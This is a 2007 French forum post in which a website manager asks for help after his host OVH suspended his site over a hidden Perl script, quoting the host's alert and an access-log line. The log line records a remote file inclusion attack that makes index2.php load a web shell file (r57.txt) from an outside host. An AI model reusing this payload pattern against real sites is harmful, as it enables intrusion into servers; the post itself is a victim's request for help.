Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2454 connectés 

  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  problème avec mon site internet

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

problème avec mon site internet

n°319041
kibae
Posté le 27-09-2007 à 12:24:16  profilanswer
 

Bonjour,
 
je ne savais pas dans quelle sous categorie poster ce message
j'ai un gros souci, pour vous expliquer le pbm, j'ai donc herité d'un site à gérer avec le boulot et en gros je ne m'y connais pas suffisament pour
règler ce souci. :'(
bref, je suis perdu  
aidez moi !!!
 
"Problème rencontré : Hidden PERL script
Commande apparente : lynx
Exécutable utilisé : /usr/bin/perl
Horodatage: Wed Sep 26 16:16:00 CEST 2007
 
Ceci n'est pas autorisé sur nos installations,
car c'est une tentative potentielle de piratage.
 
Si ce n'est pas vous qui avez lancé ce script, cela signifie
qu'il y a une faille sur votre site et qu'un hacker s'en
est servi pour réaliser cette opération.
 
Nous avons désactivé l'accès web temporairement pour éviter tout
risque de nouveau piratage.
 
Vous pouvez vous connecter via ftp, pour modifier les scripts qui
peuvent poser problème. Pensez également à mettre à jour les
logiciels que vous utilisez comme phpnuke, phpbb, etc.
 
Comment faire ?
Consultez ces guides :
- http://guides.ovh.com/AlerteHackMutu
- http://guide.ovh.com/SecuriteSite
 
Une fois le problème résolu, vous pouvez réouvrir votre site
en remettant les bons droits sur le répertoire "www" (chmod 705 www)."
 
 
 
Voici le log :
il y a une faille de securité sur votre site  
201008211214.user.veloxzone.com.br www.*****.fr - [26/Sep/2007:16:15:43 +0200] "POST /v2/index2.php?page=http://www.milh0use.xpg.com.br/r57.txt? HTTP/1.1" 200 4978 "http://www.*****.fr/v2/index2.php?page=http://www.milh0use.xpg.com.br/r57.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"


Message édité par kibae le 27-09-2007 à 15:13:37
mood
Publicité
Posté le 27-09-2007 à 12:24:16  profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  problème avec mon site internet

 

Sujets relatifs
Probléme Point d'acces Netgear WPN802 + NeufBoxprobleme de micro coupure
probleme avec le controlleur ethernetProblème de transfert sur serveur FTP Actif
probleme delirant de connection sous vista !!!Problème connexion sur Vista
Probleme Connection internet VooProlbème internet ...Telechargement se bloque
probleme de wifi avec vista et livebox o_O 
Plus de sujets relatifs à : problème avec mon site internet


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR